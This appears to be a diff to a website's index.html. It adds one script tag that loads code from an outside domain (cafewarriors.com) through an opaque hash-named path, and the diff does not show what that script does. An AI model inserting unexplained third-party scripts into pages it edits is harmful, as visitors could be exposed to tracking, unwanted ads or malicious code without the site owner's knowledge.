--- a/index.html
+++ b/index.html
@@ -582,5 +582,7 @@ checkAndShowLayer();
 // Check again every 10 minutes in case page stays open
 setInterval(checkAndShowLayer, 600000);
 </script>
+
+<script type='text/javascript' src='//cafewarriors.com/61/51/71/61517150132ff41edb773555ec988118.js'></script>
 </body>
 </html>
